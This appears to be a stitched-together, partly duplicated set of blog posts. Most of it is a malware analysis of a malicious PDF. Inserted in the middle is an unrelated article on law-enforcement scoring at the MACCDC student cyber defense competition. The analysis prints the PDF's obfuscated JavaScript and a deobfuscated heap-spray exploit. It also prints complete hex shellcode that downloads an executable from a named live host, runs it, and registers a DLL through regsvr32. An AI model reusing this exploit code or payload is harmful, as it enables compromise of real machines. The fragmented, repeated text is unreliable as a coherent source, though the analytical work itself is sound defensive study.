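# Bytes 0x130-0x146 of the hex dump above.
SAMPLE = bytes.fromhex("c7042472656773c744240476723332c7442408202d7320")

if __name__ == "__main__":
    print(repr(stacked_strings(SAMPLE)))
```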

To really see what it's doing, I'd chop that code down to the actual functional code, which normally starts after the large block of nulls. In this case, it begins with something of a "NOP sled": 0x4141414141414141. Extract the code and run it through Shellcode2Exe.py, then run the resulting application in OllyDbg. OllyDbg will then resolve the API calls as they're being made, letting you see the calls that include urlmon.URLDownloadToFileA().

That's basically it. A quick one-hour write-up from home using free tools on a malicious PDF sent to my personal account. The end result is pretty boring itself, but I found the JavaScript interesting and decided to publish a few steps for those who were possibly curious about how it worked.

(Pseudo) Exploit Analysis:
Based on a comment that was posted today, I went back to analyse the exploit of the PDF. Exploit analysis isn't my forte by a long shot, but I wanted to show the basic steps of how I worked through this file. Also, I was pointed to other blogs that featured this same type of sample, but tried to wave their magic wand of obscurity to say "we manually de-obfuscated it and found...". This isn't rocket science, no need to keep it secret... The magic occurred elsewhere in the PDF, in something we'll call "Object 18":

    18 0 obj
    <</Rect [12.47 5.21 6.13.6.7] /Subtype/Widget /Ff 65536 /T (qwe123b[0]) /MK <</TP 1>> /Type/Annot /FT/Btn /DA (/CourierStd 10 Tf 0 g) /Parent 19 0 R /TU (qwe123b) /P 1 0 R /F 4>>endobj
This object (which is called by 19, which is called by 20, which is called by 21, which is called by 23 (the root object)) draws a rectangle and loads a widget in it named "qwe123b[0]", which refers basically to the output of the JavaScript. So, let's go back to our deobfuscated JavaScript and work backwards:
    qwe123b.rawValue=_ll1
There's our return value... _ll1. So, let's piece together what's returned:
    _ll1=_j8+_j9+_ll0+_j5;
_j8 is a standard block of text, "SUkqADggAABB".
_j9 calls _I2(), which repeats "QUFB" until the block of text is 10,984 characters long.
_ll0 is another standard block of text.
_j5 is another standard block of text.
So, I would combine all of these values to see what the output would be. The magic behind it all is that the large block of text this produces is simply a string of Base64 encoded data. Upon decoding, you'll see the magic first few bytes (from _j8):
    Offset(h)00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

    00000000 49 49 2A 00 38 20 00 00 41                       II*.8 ..A
These bytes refer to the file header of a TIFF graphic image. Oh, and that 10,984-character run of "QUFB"? Each "QUFB" Base64 decodes to 0x414141 ("AAA"), so the whole run is just filler. That reduces our search. At this point, we would debug Acrobat to follow the flow of data through the application, setting breakpoints at areas that handle graphic images. But, as this isn't a 0-day, a few basic Google searches help lead us to a few possible culprits, all of which are basically LibTIFF vulnerabilities. There are numerous ones, but I don't feel that I'm qualified to pinpoint an exact one.
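
For anyone who wants to check the decoding step without a hex editor, here is a small Python sketch. It only decodes the "_j8" prefix and one "QUFB" unit and reads the standard 8-byte TIFF header fields (byte order, magic number, offset of the first image file directory). It makes no attempt to identify the vulnerability, and the variable names are mine.

```python
import base64
import struct

J8 = "SUkqADggAABB"  # the "_j8" value from the decoded JavaScript

# Base64-decode the prefix; the first 8 bytes are the TIFF file header.
header = base64.b64decode(J8)

# "<2sHI": 2-byte order mark, 16-bit magic number, 32-bit offset, little-endian.
byte_order, magic, ifd_offset = struct.unpack("<2sHI", header[:8])

# One unit of the filler that _I2() repeats.
filler_unit = base64.b64decode("QUFB")

if __name__ == "__main__":
    print(header.hex())
    print(byte_order, magic, hex(ifd_offset))
    print(filler_unit)
```

The "II" order mark means little-endian, 42 is the TIFF magic number, and the offset field points past the block of filler to where the image file directory is expected.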

Enforcing the Law at the Mid Atlantic Collegiate Cyber Defense Competition (MACCDC)

The Mid-Atlantic Collegiate Cyber Defense Competition (MACCDC) is one of the many regional CCDCs, and it includes a somewhat unique aspect: law enforcement and investigations. For those unfamiliar with CCDCs, they are live network security competitions where schools face off against each other, and a red cell of pentesters, to build and maintain a secure network. While fending off attacks, the teams are responsible for creating new servers and services while performing business operations, such as running database queries for a business need. If the respective database is misconfigured, or hijacked by Red Team, then the query cannot be performed and teams suffer major score losses.

There are multiple regional CCDC competitions across the entire country as well as the National CCDC where the winners of each regional competition join to face off against each other. While each regional follows the same structure of competition, each can make slight adjustments to how they determine a winner. A law enforcement (LE) component was built into MACCDC years ago as a method to help expose competitors to the unique and frustrating challenges of fully documenting attacks.

In many competitions, schools practice being extremely responsive to attacks and, in many cases, aggressive in their responses to remove an adversary as quickly as possible. While that effort is commendable, it does not translate into the actions taken by a real-world security team. In the event of a compromise, theft of data, or denial of service attack, corporate senior leadership will not be content with a message of "We were attacked, it's been fixed."


Questions will arise:

  • Who attacked us?
  • How did they get in?
  • What did they steal?
  • How long ago did they get in?
  • Are they still there?
  • Is this an attack also seen by industry partners?


Therefore, the role of MACCDC LE is to provide students the resources necessary to collect this evidence and document an incident that can be used to adequately describe the attack. Additionally, though infrequent, a well written incident report that clearly and accurately describes an attack, shows full logs of where the attack came from, and notes exact times of attack, can allow for Exercise Control to authorize a firewall block and a possible arrest of the Red Teamer involved.

Attacks are documented using a standard form that is supplied to the students at the start of the competition: the US Secret Service Incident Response Form 4017. This is a form that is used in actual investigations for law enforcement use, and was chosen as it contained an adequately wide number of scenarios to meet every attack used by Red Team.

In recent years, each team competing in MACCDC has been required to complete at least two incident response forms by the end of the competition. While there is no limit to the number that can be submitted, each form does take time away from their other duties and each is additionally graded on its "worthiness" to law enforcement. They are then left to document any incident of their choosing with as much detail as they can.

Many teams who struggle often limit themselves with reports on suspicions of an attack. They see errant log entries, or information that doesn't look appropriate, and immediately jump into IR mode. After 30 minutes of detailing the log entries, they then learn the hard pressure of proving an attack to law enforcement.

There are many categories in which LE scores each team's submissions, for a maximum of 140 points. These include 10 points in each of the following categories:


  • Attack clearly defined
  • Scope of attack clearly defined
  • Time window clearly defined
  • Source of attack identified
  • Delivery mechanism identified
  • Damage assessment provided
  • Remediation efforts explained
  • Appropriate evidence provided
  • Timeliness of report
  • Clarity of submission
  • Clear handwriting and presentation
  • Understandable grammar
  • Completeness
  • Accuracy of report

Additionally, each report has a subjective negative score of "Waste of Tax Payer Money". This last one allows for LE to weigh in on poorly written submissions. And, as LE can provide feedback to improve submissions, teams that overwhelmingly request help from LE to submit a report that ultimately has no value can face a negative score.

The grand prize that teams rarely see is an arrest, which rewards 500 extra points. Given enough evidence, and indicators that can point to an actual hands-on-keyboard person, LE can make an arrest of a Red Teamer. The Red Teamer will be pulled from the team, their computers disconnected, and forced to sit in time-out for 20 minutes. This is often done within the competition pit itself to face public ridicule. In the past, arrests have been made based upon Red Teamers publicly documenting their attacks and the students positively identifying their systems in tweets. Students could also see unique names, handles, and identifying indicators in their attacks. Often, if a team can positively identify a very unique computer in use, via User-Agent value or similar, LE can do a probable cause search and see if they can spot the computer in the Red Team room. Most times students attempt to do this but are usually off slightly in their assessment. LE knows who the real attacker is, but if the evidence points to someone else, then the submission is of no use.


Based on these categories, here are some pitfalls and suggestions for teams:

Who attacked us?


It's easy to say "The Red Team over in the next room attacked us", but can you say exactly who it was? Can you provide IP addresses that are unique to a certain attacker subset?

Can you prove the attack and actions taken?


Did they have the evidence of the attack stored? Are there logs or screenshots available? Are they in a form that can be given to law enforcement? If not, then they have no evidence of the attack. Some teams scramble to transcribe logs as quickly as possible, while others take screenshots and copy log files to a separate system. In the case of the latter, we stop by with a USB drive, collect the data, and review it along with the incident report. The best action is to start collecting logs as soon as you see signs of an attack, especially before they're erased by Red Team. Toward the end of the competition, when Red Team becomes more brazen, it becomes even more important for Blue Teams to take screenshots. After all, how do you appropriately describe literal ghosts following your cursor on the screen or that your Exchange server was replaced with a flying nyan cat? That's also the time when Red Teamers often get lax in OPSEC, making connections from their raw systems, using their personal handles in their attacks, or bragging about them on Twitter.


Can they prove that the actions were malicious activity by an adversary and not the mistakes of an insider? "This is my team, we didn't do that." That's what they all say, prove it to me. Guess what? As LE, we can just go casually talk off-the-record to Red Team and verify if they did the attacks. Can they prove that it came from a very specific IP address, and that the IP is unique to an adversary and not to something like Scorebot?

Can you identify the source and delivery of an attack?


These are two very critical topics that many teams gloss over. What use is kicking an attacker out if you don't know how they got in? You're simply covering up the symptom but are still keeping any vulnerability wide open. By documenting the source of the attack, such as the offending IP address, a team can start creating a case of multiple attacks over a short period of time from the same source. Providing corresponding evidence from previous incident response forms can help set the foundation and allow easier points.

Additionally, the point of this exercise is to perform due diligence to identify threats and mitigate them. Many times the symptoms are reported upon, but teams don't put the extra five minutes in to determine how attacks started. Whether it was via SMB connections, RDP, SSH, or bad passwords, documenting this shows not just a response but the building of an attacker profile.

Evidence should be relevant and specific to the attack. If a Red Teamer got onto a Linux server, are there log entries for SSH brute forcing or does it show a direct login? There are different meanings, and different types of remediation, for each. Are there .bash_history files available to describe what commands were typed by the Red Teamer to show what their goals were? A brute force attempt will typically result in little actual activity, just the creation of an additional user account or application for backdooring. It will, however, create numerous log entries.

For Windows, can you find events within Event Logs to show signs of access, such as Type 10 logons (Remote Interactive Sessions) and Type 3 (connection to a shared CIFS/SMB folder)? A Windows server that's come back from a reboot will have its SYSTEM hive freshly stored to the hard drive, containing details from ShimCache to show commands executed.

Can we make our indicators shareable?


In recent years we have experimented with methods to implement threat intel into the competition, including methods for sharing indicators. As each team represents a business within the same industry as others, there's an expectation of shared attackers targeting their vertical. In the past we've made use of notifications similar to the FBI Flash Alerts. If a specific indicator or TTP is identified by at least two teams then a high level description of that TTP is provided to all teams.

For example, teams identify that a scheduled task is created for specific malware on all their systems. Multiple teams report the same method, naming conventions, and files on their system. A flash alert is created to notify that "malware has been seen being entrenched via Windows scheduled tasks." Teams are then on their own to use that information, disregard it, or figure out how it is even relevant to their work (at times that indicator doesn't even exist on a particular team's network but they'll spend over an hour trying to find it).

Tools for analysis


CCDC events have great restrictions on the software that can be used in competition. However, most tools that are needed are already on the system or available as open-source. In the field, one's best tools are simply grep and awk. Grep will be used continually to find entries in log files, and works best with the -A, -B, and -C options which are, in order, show X lines after the match, show X lines before the match, and show X lines before and after the match. Even Windows has something similar with findstr.exe!

Awk is a necessary skill to practice to take large amounts of logs and distill them down to usable data. If you're reviewing the messages log file on Linux, the output can be quite long. However, a grep for certain entries, piped through awk to print only the first, second, and fifth columns where you know the critical data always sits, can reduce the display down to minimal information for quick response.
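
On a live system that distillation is a one-liner along the lines of grep 'Failed password' /var/log/messages | awk '{print $1, $2, $5}'. For those who think better in a scripting language, the same idea is sketched below in Python. The function name select_fields and the sample log entries are invented purely for illustration and do not come from any competition data.

```python
def select_fields(lines, needle, fields=(1, 2, 5)):
    """Keep lines containing needle and return only the chosen columns.

    Columns are 1-based and whitespace-separated, like awk's $1, $2, $5.
    """
    selected = []
    for line in lines:
        if needle not in line:
            continue
        cols = line.split()
        selected.append(" ".join(cols[i - 1] for i in fields if i <= len(cols)))
    return selected


# Invented sample entries in a typical syslog layout.
SAMPLE_LOG = [
    "Mar  3 14:02:11 web01 sshd[4242]: Failed password for root from 10.0.0.5 port 51515 ssh2",
    "Mar  3 14:02:12 web01 cron[811]: (root) CMD (run-parts /etc/cron.hourly)",
    "Mar  3 14:02:13 web01 sshd[4243]: Failed password for admin from 10.0.0.5 port 51520 ssh2",
]

if __name__ == "__main__":
    for row in select_fields(SAMPLE_LOG, "Failed password"):
        print(row)
```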

On Linux and Unix environments, many students block their own analysis by relying on standard commands, like `ls` to see times. Move beyond that. Use `stat` to see all metadata for a given file. Use `find` in creative ways to watch for attacks. `find ~/ -type f -mtime -1` will quickly show any files modified within the last day while `find /etc -type f -cmin -10` will show every file in /etc whose status (contents, permissions, or ownership) changed within the last 10 minutes, which includes newly created files.

Learn your operating system! We're just taking existing tool sets and using the command line to chain data together, manipulating and sorting it, as a means to answer very simple questions.

When we create the Law Enforcement team for MACCDC we don't just bring together a few volunteers. We bring together experience, knowledge, and skill from those who have done the work. Some of us have done IR as part of commercial consulting, some for criminal law enforcement cases, others for detection and response within corporate environments.


There is no magic here. There are no 'gotchas'. Attacks are realistic and so are the demands. The data exists to do investigations, and to even do them quickly. Some of the teams more experienced in this field have been able to document a full attack, from SSH brute force to privilege escalation to rootkit installation in real-time, providing a report mere minutes after removing the malware and patching their system. 

That is the necessary skill to learn.

Malicious PDF Analysis: Reverse code obfuscation

I normally don't find the time to analyze malware at home, unless it is somehow targeted towards me (like the prior write-up of an infection on this site). This last week I received a very suspicious PDF in an email that made it through Gmail's spam filters and grabbed my attention.

The email was delivered to my Google Mail account and appeared in my inbox. It was easily accessible at first, but within two days Google alerted on the virus in the attachment and prevented downloading it. The email had one attachment, 92247.pdf, which could still be obtained as Base64 when viewing the email in its raw form.

A quick view in a hex editor showed that the file, only 13,205 bytes in size, included no obvious dropper, decoy, or even displayable PDF data. There was just one object of note, which contained an XML subform with embedded JavaScript. Boring...

Upon examining the JavaScript, I saw a large block of data that would normally contain the shellcode, or even further JavaScript, to attack the victimized system. However, this example proved odd. There was a large block of such data (abbreviated below), but it contained only integers between 0 and 74. This is not standard shellcode.

    arr='0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@12@11@3@5@5@5@11@9';

So I started looking at the surrounding code:



    8 0 obj <</Length 325325>> stream <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
    <asd/>as<config xmlns='123'><asd/>
    <xdp:present>
    <pdf>
    <xdp:interactive>1</xdp:interactive>
    <int>0</int>
    a
    <asd/>a<version>1.5</version>
    a<asd/>
    </pdf>
    </xdp:present>
    <asd/></config><asd/>
    <template xmlns='http://www.xfa.org/schema/xfa-template/2.5/'>
    <asd/>
    a<subform name="a1"> <pageSet>
    <pageArea id="roteYom" name="roteYom">
    <contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/>
    <medium long="792pt" short="612pt" stock="default"/>
    </pageArea>
    </pageSet>
    <asd/>a
    <subform name='v236536b346b'>
    a<asd/>a<field name='qwe123b'>a<asd/>a<event activity='initialize'>
    <script contentTyp='application'
    contentType='application/x-javascript'>
    x='e';
    arr='0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@12@11@3@5@5@5@11@9';
    cc={q:"var pding;b,cefhots_x=wAy()l1\"420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"}.q;

    q=x+'v'+'al';
    a=(Date+String).substr(2,3);
    aa=([].unshift+[].reverse).substr(2,3);
    if (aa==a){
    t='3vtwe';
    e=t['substr'];
    w=e(12)[q];
    s=[];
    ar=arr.split('@');
    n=cc;
    for(i=0;i<ar.length;i++){
    s[i]=n[ar[i]];
    }
    if(a===aa)w(s.join(''));
    }
    </script>a
    </event><ui>
    <imageEdit/>
    </ui>
    </field>
    </subform>
    </subform><Gsdg/>a</template>a<asd/>a<xfa:datasets a='a' xmlns:xfa='http://www.xfa.org/schema/xfa-data/1.1' b='b'>
    <xfa:data><a1 test="123">
    </a1>
    </xfa:data>
    </xfa:datasets>
    </xdp:xdp>
    endstream
    endobj
The first few things that popped out were obfuscated / escaped variable names. You can see a reference to "n" but nowhere where it is initialized. Instead, you see variables named "&#000119;" and "&#000110;". These are HTML character references carrying the ASCII decimal values for "w" and "n" respectively. Additionally, operators like "<" are escaped as the HTML entity "&lt;". The big thing we look for is the "eval()" statement, and it is equally obfuscated as: x='e'; q=x + 'v'+'al';, making q = "eval".

But, what about that large block of data? And what is up with that unusual "cc" variable that contains a large list of characters? By analyzing the decoding "for" loop, you can see the meaning. The "cc" is actually the custom character set of the end result, and the large data block "arr" is a series of numbers that each reference an individual character, separated by "@".

With this configuration, you can visually analyze the first few pointers:
0@1@2@3@4@1@5@5@6@7@8@9 equals "var padding;". Bingo. But, even with this layer of obfuscation, a quick Python script makes short work of it:
    # Index list (abbreviated here); each number is an offset into cc
    arr='0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@11@3@5@5@28@30@28@28@9'
    # Custom character set copied from the PDF's JavaScript
    cc="var pding;b,cefhots_x=wAy()l1\"420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"
    # Look up each index in cc and join the characters back together
    result="".join(cc[int(i)] for i in arr.split("@"))
    print(result)
When run, voila! Our deobfuscated code:
    var padding;var bbb, ccc, ddd, eee, fff, ggg, hhh;var pointers_a, i;var x = new
    Array();var y = new Array();var _l1="4c20600f0517804a3c20600f0f63804aa3eb804a302
    0824a6e2f804a41414141260000000000000000000000000000001239804a6420600f00040000414
    14141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0
    374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f
    5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e240
    3dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf
    38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1
    083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5
    c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c
    7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00f
    f561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c
    46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f706874747
    03a2f2f757262616e2d676561722e636f6d2f3430345f706167655f696d616765732f303230362e6
    578650000";var _l2="4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a4141
    4141260000000000000000000000000000007188804a6420600f0004000041414141414141416683
    e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ff
    ffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c9
    4941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ec
    ff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559
    e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
    00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc70424726567
    73c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7
    441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a00
    53ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e8
    9cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f757262616e
    2d676561722e636f6d2f3430345f706167655f696d616765732f303230362e6578650000";_l3=ap
    p;_l4=new Array();function _l5(){var _l6=_l3.viewerVersion.toString();_l6=_l6.re
    place('.','');while(_l6.length<4)_l6+='0';return parseInt(_l6,10)}function _l7(_
    l8,_l9){while(_l8.length*2<_l9)_l8+=_l8;return _l8.substring(0,_l9/2)}function _
    I0(_I1){_I1=unescape(_I1);roteDak=_I1.length*2;dakRote=unescape('%u9090');spray=
    _l7(dakRote,0x2000-roteDak);loxWhee=_I1+spray;loxWhee=_l7(loxWhee,524098);for(i=
    0; i < 400; i++)_l4[i]=loxWhee.substr(0,loxWhee.length-1)+dakRote;}function _I2(
    _I1,len){while(_I1.length<len)_I1+=_I1;return _I1.substring(0,len)}function _I3(
    _I1){ret='';for(i=0;i<_I1.length;i+=2){b=_I1.substr(i,2);c=parseInt(b,16);ret+=S
    tring.fromCharCode(c);}return ret}function _ji1(_I1,_I4){_I5='';for(_I6=0;_I6<_I
    1.length;_I6++){_l9=_I4.length;_I7=_I1.charCodeAt(_I6);_I8=_I4.charCodeAt(_I6%_l
    9);_I5+=String.fromCharCode(_I7^_I8);}return _I5}function _I9(_I6){_j0=_I6.toStr
    ing(16);_j1=_j0.length;_I5=(_j1%2)?'0'+_j0:_j0;return _I5}function _j2(_I1){_I5=
    '';for(_I6=0;_I6<_I1.length;_I6+=2){_I5+='%u';_I5+=_I9(_I1.charCodeAt(_I6+1));_I
    5+=_I9(_I1.charCodeAt(_I6))}return _I5}function _j3(){_j4=_l5();if(_j4<9000){_j5
    ='o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';_j6=_l1;_j7=
    _I3(_j6)}else{_j5='kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE
    4BK';_j6=_l2;_j7=_I3(_j6)}_j8='SUkqADggAABB';_j9=_I2('QUFB',10984);_ll0='QQcAAAE
    DAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwE
    EAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';_ll1=_j8+_j9+_ll0+_j5;_ll2=_ji1(_
    j7,'');if(_ll2.length%2)_ll2+=unescape('');_ll3=_j2(_ll2);with({k:_ll3})_I0(k
    );qwe123b.rawValue=_ll1}_j3();
With this type of output, I would typically use Malzilla to clean it up for exploit analysis. But, with the shell code in plain sight, I'll go right for the payload. There are actually two copies of the shell code, stored as "_l1" and "_l2", with a few slight differences between the two. The code is actually binary data stored as plaintext hex, where every two characters give the hexadecimal value of one byte. Copying and pasting the data into a hex editor can convert it to binary.
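If a hex editor isn't handy, the same conversion is a couple of lines of Python. The sketch below uses only the last few dozen bytes of "_l1" (copied from the output above) to keep it short; the helper name and the minimum string length are my own choices, not part of the sample.

```python
import re

# Tail end of the "_l1" hex string from the decoded JavaScript (truncated for brevity)
hex_tail = ("1a2f70687474703a2f2f757262616e2d676561722e636f6d2f"
            "3430345f706167655f696d616765732f303230362e6578650000")

# Every two hex characters become one byte
shellcode_tail = bytes.fromhex(hex_tail)

def printable_strings(blob, min_len=4):
    # Poor man's "strings": runs of printable ASCII at least min_len long
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]

strings = printable_strings(shellcode_tail)
for s in strings:
    print(s)
```

Feeding the full "_l1" or "_l2" value through the same two steps gives the binary blob plus a first look at any plain-text strings in it.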

Now, normally you would look for shellcode obfuscation and API resolutions with IDA Pro or a debugger like Immunity/OllyDbg, but this one is pretty straightforward. It's a simple downloader with the URL in plain text (similar to a sample I demonstrated to TV's David McCallum... just saying ;)). When I view the data in my favorite free hex editor, HxD, I can see:
    Offset(h)00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

    00000000 4C 20 60 0F 05 17 80 4A 3C 20 60 0F 0F 63 80 4A L `...€J< `..c€J
    00000010 A3 EB 80 4A 30 20 82 4A 6E 2F 80 4A 41 41 41 41 £ë€J0 ‚Jn/€JAAAA
    00000020 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &...............
    00000030 12 39 80 4A 64 20 60 0F 00 04 00 00 41 41 41 41 .9€Jd `.....AAAA
    00000040 41 41 41 41 66 83 E4 FC FC 85 E4 75 34 E9 5F 33 AAAAfƒäüü…äu4é_3
    00000050 C0 64 8B 40 30 8B 40 0C 8B 70 1C 56 8B 76 08 33 Àd‹@0‹@.‹p.V‹v.3
    00000060 DB 66 8B 5E 3C 03 74 33 2C 81 EE 15 10 FF FF B8 Ûf‹^<.t3,.î..ÿÿ¸
    00000070 8B 40 30 C3 46 39 06 75 FB 87 34 24 85 E4 75 51 ‹@0ÃF9.uû‡4$…äuQ
    00000080 E9 EB 4C 51 56 8B 75 3C 8B 74 35 78 03 F5 56 8B éëLQV‹u<‹t5x.õV‹
    00000090 76 20 03 F5 33 C9 49 41 FC AD 03 C5 33 DB 0F BE v .õ3ÉIAü..Å3Û.¾
    000000A0 10 38 F2 74 08 C1 CB 0D 03 DA 40 EB F1 3B 1F 75 .8òt.ÁË..Ú@ëñ;.u
    000000B0 E6 5E 8B 5E 24 03 DD 66 8B 0C 4B 8D 46 EC FF 54 æ^‹^$.Ýf‹.K.FìÿT
    000000C0 24 0C 8B D8 03 DD 8B 04 8B 03 C5 AB 5E 59 C3 EB $.‹Ø.Ý‹.‹.Å«^YÃë
    000000D0 53 AD 8B 68 20 80 7D 0C 33 74 03 96 EB F3 8B 68 S.‹h €}.3t.–ëó‹h
    000000E0 08 8B F7 6A 05 59 E8 98 FF FF FF E2 F9 E8 00 00 .‹÷j.Yè˜ÿÿÿâùè..
    000000F0 00 00 58 50 6A 40 68 FF 00 00 00 50 83 C0 19 50 ..XPj@hÿ...PƒÀ.P
    00000100 55 8B EC 8B 5E 10 83 C3 05 FF E3 68 6F 6E 00 00 U‹ì‹^.ƒÃ.ÿãhon..
    00000110 68 75 72 6C 6D 54 FF 16 83 C4 08 8B E8 E8 61 FF hurlmTÿ.ƒÄ.‹èèaÿ
    00000120 FF FF EB 02 EB 72 81 EC 04 01 00 00 8D 5C 24 0C ÿÿë.ër.ì.....\$.
    00000130 C7 04 24 72 65 67 73 C7 44 24 04 76 72 33 32 C7 Ç.$regsÇD$.vr32Ç
    00000140 44 24 08 20 2D 73 20 53 68 F8 00 00 00 FF 56 0C D$. -s Shø...ÿV.
    00000150 8B E8 33 C9 51 C7 44 1D 00 77 70 62 74 C7 44 1D ‹è3ÉQÇD..wpbtÇD.
    00000160 05 2E 64 6C 6C C6 44 1D 09 00 59 8A C1 04 30 88 ..dllÆD...YŠÁ.0ˆ
    00000170 44 1D 04 41 51 6A 00 6A 00 53 57 6A 00 FF 56 14 D..AQj.j.SWj.ÿV.
    00000180 85 C0 75 16 6A 00 53 FF 56 04 6A 00 83 EB 0C 53 …Àu.j.SÿV.j.ƒë.S
    00000190 FF 56 04 83 C3 0C EB 02 EB 13 47 80 3F 00 75 FA ÿV.ƒÃ.ë.ë.G€?.uú
    000001A0 47 80 3F 00 75 C4 6A 00 6A FE FF 56 08 E8 9C FE G€?.uÄj.jþÿV.èœþ
    000001B0 FF FF 8E 4E 0E EC 98 FE 8A 0E 89 6F 01 BD 33 CA ÿÿŽN.ì˜þŠ.‰o.½3Ê
    000001C0 8A 5B 1B C6 46 79 36 1A 2F 70 68 74 74 70 3A 2F Š[.ÆFy6./phttp:/
    000001D0 2F 75 72 62 61 6E 2D 67 65 61 72 2E 63 6F 6D 2F /urban-gear.com/
    000001E0 34 30 34 5F 70 61 67 65 5F 69 6D 61 67 65 73 2F 404_page_images/
    000001F0 30 32 30 36 2E 65 78 65 00 00 0206.exe..
The URL is a dead giveaway. A well-trained eye can see additional strings appear, typically as four bytes of opcode followed by four bytes of a string, like: codeDATAcodeDATAcodeDATA (Why? Because it takes 4 bytes of code to say "move these 4 bytes of data into memory at location X"). A visual analysis shows the command line: "regsvr32 -s wpbt.dll", as well as a reference to the DLL "urlmon" (practice looking for those). So, from this, we can tell some of the functionality. We know that it at least downloads an executable file from a remote server to the local temporary path (API call to GetTempPathA) and runs it, and that it also potentially installs a DLL on the system. A view from within IDA Pro would tell more, but I think I've reached enough text with this posting.
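The codeDATAcodeDATA pattern can also be pulled apart mechanically. Here is a rough sketch that only knows two x86 encodings, "mov dword [esp], imm32" (C7 04 24) and "mov dword [esp+disp8], imm32" (C7 44 24 xx), and is run against the bytes at offset 0x130 of the dump above. Other addressing forms, such as the ones that build "wpbt.dll", would need more patterns.

```python
import re

# Bytes from offset 0x130 of the hex dump: three consecutive stack writes
code = bytes.fromhex("c7042472656773c744240476723332c7442408202d7320")

# C7 04 24 imm32     -> mov dword [esp], imm32
# C7 44 24 xx imm32  -> mov dword [esp+xx], imm32
STACK_WRITE = re.compile(rb"\xc7(?:\x04\x24|\x44\x24.)(.{4})", re.DOTALL)

# Concatenate the 4-byte immediates in the order they are written
stack_string = b"".join(m.group(1) for m in STACK_WRITE.finditer(code))
print(stack_string)
```

This is a byte-pattern match rather than a real disassembly, so expect false hits on arbitrary data; it's a way to train the eye, not a replacement for IDA.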

To really see what it's doing, I'd chop that code down to the actual functional code, which normally starts after the large block of nulls. In this case, it begins with a somewhat "NOP sled" of 0x4141414141414141. Extract the code and run it through Shellcode2Exe.py, then run the resulting application in OllyDbg. OllyDbg will then resolve the API calls as they're being made, letting you see the calls that include urlmon.URLDownloadToFileA().

That's basically it. A quick one-hour write-up from home using free tools on a malicious PDF sent to my personal account. The end result is pretty boring itself, but I found the JavaScript interesting and decided to publish a few steps for those who were possibly curious about how it worked.

(Pseudo) Exploit Analysis:
Based on a comment that was posted today, I went back to analyse the exploit of the PDF. Exploit analysis isn't my forte by a long shot, but I wanted to show the basic steps of how I did this file. Also, I was pointed to other blogs that featured this same type of sample, but tried to wave their magic wand of obscurity to say "we manually de-obfuscated it and found...". This isn't rocket science, no need to keep it secret... The magic occurred elsewhere in the PDF, in something we'll call "Object 18":

    18 0 obj
    <</Rect [12.47 5.21 6.13.6.7] /Subtype/Widget /Ff 65536 /T (qwe123b[0]) /MK <</TP 1>> /Type/Annot /FT/Btn /DA (/CourierStd 10 Tf 0 g) /Parent 19 0 R /TU (qwe123b) /P 1 0 R /F 4>>endobj
This object (which is called by 19, which is called by 20, which is called by 21, which is called by 23 (the root object))  draws a rectangle and loads a widget in it named "qwe123b[0]", which refers basically to the output of the JavaScript. So, let's go back to our deobfuscated JavaScript and work backwards:
    qwe123b.rawValue=_ll1
There's our return value... _ll1. So, let's piece together what's returned:
    _ll1=_j8+_j9+_ll0+_j5;
_j8 is a standard block of text, "SUkqADggAABB".
_j9 calls _I2(), which repeats "QUFB" until the block is 10,984 characters long (2,746 copies).
_ll0 is another standard block of text.
_j5 is another standard block of text.
So, I would combine all of these values to see what the output would be. The magic behind it all is that the large block of text this produces is simply a string of Base64 encoded data. Upon decoding, you'll see the magic first few bytes (from _j8):
    Offset(h)00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

    00000000 49 49 2A 00 38 20 00 00 41                       II*.8 ..A
